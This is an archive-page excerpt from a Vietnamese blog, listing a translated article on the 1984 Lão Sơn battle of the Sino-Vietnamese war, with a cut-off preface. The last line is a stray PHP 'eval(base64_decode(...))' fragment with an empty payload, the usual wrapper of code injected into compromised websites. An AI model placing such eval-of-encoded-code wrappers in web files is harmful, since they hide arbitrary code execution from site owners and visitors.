Archive for January 5th, 2009

Trận Lão Sơn trong cuộc chiến Trung-Việt lần thứ hai năm 1984

Lời người dịch: Thời điểm là đầu năm 1984. Bài hát ca ngợi tình hữu nghị Việt Trung “Việt Nam Trung Hoa núi liền núi sông liền sông, mối tình hữu nghị thắm như rạng đông” của Đổ Nhuận không còn được hát trong những chương trì

01.5.2009 | Ký-Truyện-Tùy Bút |

5 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>